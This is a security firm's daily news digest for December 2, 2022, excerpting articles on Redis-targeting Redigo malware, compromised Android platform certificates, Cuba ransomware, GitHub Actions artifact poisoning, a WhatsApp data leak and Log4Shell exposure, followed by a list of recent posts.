December 2, 2022

Fortify Security Team
Dec 2, 2022

Title: New Go-Based Redigo Malware Targets Redis Servers
Date Published: December 1, 2022

https://securityaffairs.co/wordpress/139164/malware/redigo-malware-targets-redis-servers.html

Excerpt: “Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat actors are exploiting a critical vulnerability, tracked as CVE-2022-0543, in Redis (Remote Dictionary Server) servers. Redis (remote dictionary server) is an open source in-memory database and cache. The CVE-2022-0543 flaw is a Lua sandbox escape flaw that impacts Debian and Debian-derived Linux distributions. The vulnerability, which was rated 10 out of 10 for severity, could be exploited by a remote attacker with the ability to execute arbitrary Lua scripts to possibly escape the Lua sandbox and execute arbitrary code on the underlying machine. Juniper Threat Labs researchers reported that the Muhstik botnet has been observed targeting Redis servers exploiting the CVE-2022-0543 vulnerability.”

Title: Samsung, LG, Mediatek Certificates Compromised to Sign Android Malware
Date Published: December 1, 2022

https://www.bleepingcomputer.com/news/security/samsung-lg-mediatek-certificates-compromised-to-sign-android-malware/

Excerpt: “Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware. OEM Android device manufacturers use platform certificates, or platform keys, to sign devices’ core ROM images containing the Android operating system and associated apps. If apps, even malicious ones, are signed with the same platform certificate and assigned the highly privileged ‘android.uid.system’ user id, these apps will also gain system-level access to the Android device. These privileges provide access to sensitive permissions not normally granted to apps, such as managing ongoing calls, installing or deleting packages, gathering information about the device, and other highly sensitive actions. As shared in a now public report on the Android Partner Vulnerability Initiative (AVPI) issue tracker, this abusive use of platform keys was discovered by Lukasz Siewierski, a Reverse Engineer on Google’s Android Security team.”

Title: These File Types Are the Ones Most Commonly Used by Hackers to Hide Their Malware
Date Published: December 1, 2022

https://www.zdnet.com/article/these-file-types-are-the-ones-most-commonly-used-by-hackers-to-hide-their-malware/

Excerpt: “Careful when you click: Cyber criminals are hiding malicious payload to make it more difficult for users – and anti-virus software – to detect. ZIP and RAR files have overtaken Office documents as the file most commonly used by cyber criminals to deliver malware, according to an analysis of real-world cyber attacks and data collected from millions of PCs. The research, based on customer data by HP Wolf Security, found in the period between July and September this year, 42% of attempts at delivering malware attacks used archive file formats, including ZIP and RAR. That means cyber attacks attempting to exploit ZIP and RAR formats are more common than those which attempt to deliver malware using Microsoft Office documents like Microsoft Word and Microsoft Excel files, which have long been the preferred method of luring victims into downloading malware. According to researchers, this marks the first time in over three years that archive files have surpassed Microsoft Office files as the most common means of delivering malware.”

Title: Cuba Ransomware Actors Pocket $60m
Date Published: December 2, 2022

https://www.infosecurity-magazine.com/news/cuba-ransomware-actors-pocket-60m/

Excerpt: “A leading US security agency has warned of the continued threat posed by the Cuba ransomware variant, which has made its affiliates and developers $60m as of August. The US Cybersecurity and Infrastructure Security Agency (CISA) revealed in a new alert that the ransomware has compromised at least 100 entities worldwide, having doubled its victim count in the US since last December. The group and its affiliates mainly target financial services, government, healthcare, critical manufacturing and IT companies. Disappointingly, ransoms are increasingly being paid, CISA said. The group has demanded $145m to date in recorded attacks. Threat actors use one of several tried-and-tested techniques to gain initial access: phishing campaigns, vulnerability exploitation, compromised credentials and remote desktop protocol (RDP) tools. Once inside, the ransomware itself is distributed via a loader known as “Hancitor,” the report revealed. However, since spring this year, the group has modified some of its tactics, techniques and procedures (TTPs). It uses a dropper that writes a kernel driver to the file system called ApcHelper.sys, in order to terminate any security products running on victims’ machines. It also exploits CVE-2022-24521 to steal system tokens and elevate privileges, and CVE-2020-1472 to gain domain administrator privileges. CISA also cited Palo Alto Networks research linking the Cuba ransomware variant to the custom RomCom RAT for command and control (C2), and the Industrial Spy ransomware, on whose marketplace the group has sold stolen data.”

Title: Artifact Poisoning in GitHub Actions Imports Malware via Software Pipelines
Date Published: December 1, 2022

https://www.darkreading.com/application-security/artifact-poisoning-github-actions-malware-software-pipelines

Excerpt: “A vulnerability discovered in GitHub Actions could allow an attacker to poison a developer’s pipeline, highlighting the risk that insecure software pipelines pose. An attacker submitting changes to an open source repository on GitHub could cause downstream software projects that include the latest version of a component to compile updates with malicious code. That’s according to software supply chain security firm Legit Security, which said in an advisory published on Dec. 1 that this “artifact poisoning” weakness could affect software projects that use GitHub Actions — a service for automating development pipelines — by triggering the build process when a change is detected in a software dependency. The vulnerability is not theoretical: Legit Security simulated an attack on the project that manages Rust, causing the project to recompile using a customized — and malicious — version of the popular GCC software library, the company stated in the advisory.”

Title: Android Malware Infected 300,000 Devices to Steal Facebook Accounts
Date Published: December 1, 2022

https://www.bleepingcomputer.com/news/security/android-malware-infected-300-000-devices-to-steal-facebook-accounts/

Excerpt: “An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. According to a new report by Zimperium, the campaign has infected at least 300,000 devices across 71 countries, primarily focusing on Vietnam. Some apps used for spreading the trojan, which Zimperium named ‘Schoolyard Bully,’ were previously on Google Play but have since been removed. However, Zimperium warns that the apps continue to be spread through third-party Android app stores. The Schoolyard Bully malware gets its name from masquerading as harmless and even beneficial educational apps. However, the main goal of the ‘malware is to steal Facebook account credentials (email and password), account ID, username, device name, device RAM, and device API.”

Title: WhatsApp Files on Dark Web Show Millions of Records For Sale
Date Published: December 1, 2022

https://www.infosecurity-magazine.com/news/dark-web-show-millions-of-whatsapp/

Excerpt: “In mid-November, a threat actor posting on a dark web forum claimed to have stolen the personal information of almost 500 million WhatsApp users. Now, Check Point Research (CPR) has published a new advisory analyzing the exposed files and confirming the leak includes 360 million phone numbers from 108 countries. While CPR was unable to confirm the leaked numbers belonged to WhatsApp users, their analysis showed that the phone numbers varied in quantity among countries, ranging from 604 in Bosnia and Herzegovina to 35 million attributed to Italy. According to the document, the whole list went on sale for four days and is now being distributed for free among dark web users. “While the information on sale does not expose the content of any messages themselves, it is still worrying to see such a large volume of phone numbers for sale on the Dark Web. There is the potential that this information could be used as part of tailored phishing attacks in the future,” said Deryck Mitchelson, field CISO of EMEA at CPR. At the same time, Karol Paciorek, a security researcher from the computer security incident response team of the Polish financial sector (CSIRT KNF), claimed on Twitter on Tuesday that the leaked database is a re-use of an older 2019 Facebook breach.”

Title: Financial Organizations More Prone to Accidental Data Leakage
Date Published: December 2, 2022

https://www.helpnetsecurity.com/2022/12/02/financial-sector-cloud-security/

Excerpt: “Netwrix announced additional findings for the financial and banking sector from its global 2022 Cloud Security Report. Compared to other industries surveyed, financial institutions are much more concerned about users who have legitimate access to their cloud infrastructure. Indeed, 44 percent of respondents in this sector say their own IT staff poses the biggest risk to data security in the cloud and 47 percent worry about contractors and partners, compared to 30 percent and 36 percent respectively in other verticals surveyed. “Financial organizations experience accidental data leakage more often than companies in other verticals: 32 percent of them reported this type of security incident within the last 12 months, compared to the average of 25 percent. This is a good reason for them to be concerned about users who might unintentionally expose sensitive information. To address this threat, organizations need to implement a zero-standing privilege approach in which elevated access rights are granted only when they are needed and only for as long as needed,” comments Dirk Schrader, VP of security research at Netwrix. “Cloud misconfigurations are another common reason for accidental data leakage. Therefore, security teams must continually monitor the integrity of their cloud configurations, ideally with a dedicated solution that automates the process.” All sectors say phishing is the most common type of attack they experience. However, 91 percent of financial institutions say they can spot phishing within minutes or hours, compared to 82 percent of respondents in other verticals.”

Title: Android Keyboard Apps With 2 Million Downloads Can Remotely Hack Your Device
Date Published: December 2, 2022

https://securityaffairs.co/wordpress/139174/hacking/android-keyboard-apps-flaws.html

Excerpt: “Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively two million installs that are affected by multiple flaws (CVE-2022-45477, CVE-2022-45478, CVE-2022-45479, CVE-2022-45480, CVE-2022-45481, CVE-2022-45482, CVE-2022-45483) that can be exploited by attackers to compromise a mobile phone. Keyboard and mouse apps connect to a server on a desktop or laptop computer and transmit mouse and keyboard events to a remote server. These three Android apps (Lazy Mouse, PC Keyboard, and Telepad) are Keyboard apps available on the official Google Play Store and are used as remote keyboard and mouse. CyRC experts warn of weak or missing authentication mechanisms, missing authorization, and insecure communication vulnerabilities in the three apps. “An exploit of the authentication and authorization vulnerabilities could allow remote unauthenticated attackers to execute arbitrary commands. Similarly, an exploit of the insecure communication vulnerability exposes the user’s keystrokes, including sensitive information such as usernames and passwords.” reads the analysis published by CyRC.”

Title: One Year After Log4Shell, Most Firms Are Still Exposed to Attack
Date Published: December 1, 2022

https://www.darkreading.com/application-security/one-year-later-log4shell-exposed-attack

Excerpt: “Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it. The Log4j vulnerability continues to present a major threat to enterprise organizations one year after the Apache Software Foundation disclosed it last November — even though the number of publicly disclosed attacks targeting the flaw itself has been less than many might have initially expected. A high percentage of systems still remain unpatched against the flaw, and organizations face challenges in finding and remediating the issue and then preventing the flaw from being reintroduced into the environment, security researchers say. “The fact that Log4j is used in [nearly] 64% of Java applications and only 50% of those have updated to a fully fixed version means attackers will continue to target it,” says David Lindner, CISO at Contrast Security. “At least for now, attackers continue to have a field day in finding paths to exploit through Log4j.” The Log4j flaw (CVE-2021-44228), commonly referred to as Log4Shell, exists in Log4j’s Java Naming and Directory Interface (JNDI) function for data storage and retrieval. It gives remote attackers a trivially easy way to take control of vulnerable systems — a problem given that Log4J is used in virtually every Java application environment.”

Recent Posts

December 9, 2022

Title: US Health Dept Warns of Royal Ransomware Targeting Healthcare Date Published: December 8, 2022 https://www.bleepingcomputer.com/news/security/us-health-dept-warns-of-royal-ransomware-targeting-healthcare/ Excerpt: “The U.S. Department of Health and Human...

December 8, 2022

Title: New ‘Zombinder’ Platform Binds Android Malware With Legitimate Apps Date Published: December 8, 2022 https://www.bleepingcomputer.com/news/security/new-zombinder-platform-binds-android-malware-with-legitimate-apps/ Excerpt: “A darknet platform dubbed...

December 7, 2022

Title: Fantasy – A New Agrius Wiper Deployed Through a Supply-Chain Attack Date Published: December 7, 2022 https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/ Excerpt: “ESET researchers discovered a new wiper and its execution...

December 6, 2022

Title: This Badly Made Ransomware Can’t Decrypt Your Files, Even if You Pay the Ransom Date Published: December 6, 2022 https://www.zdnet.com/article/this-badly-made-ransomware-cant-decrypt-your-files-even-if-you-pay-the-ransom/ Excerpt: “Victims of a recently...

December 5, 2022

Title: SIM Swapper Gets 18-Months for Involvement in $22 Million Crypto Heist Date Published: December 3, 2022 https://www.bleepingcomputer.com/news/security/sim-swapper-gets-18-months-for-involvement-in-22-million-crypto-heist/ Excerpt: “Florida man Nicholas Truglia...

December 1, 2022

Title: Keralty Ransomware Attack Impacts Colombia’s Health Care System Date Published: November 30, 2022 https://www.bleepingcomputer.com/news/security/keralty-ransomware-attack-impacts-colombias-health-care-system/ Excerpt: “The Keralty multinational healthcare...

November 30, 2022

Title: China-Linked UNC4191 APT Relies on USB Devices in Attacks Against Entities in the Philippines Date Published: November 30, 2022 https://securityaffairs.co/wordpress/139097/apt/unc4191-used-usb-devices.html Excerpt: “An alleged China-linked cyberespionage group,...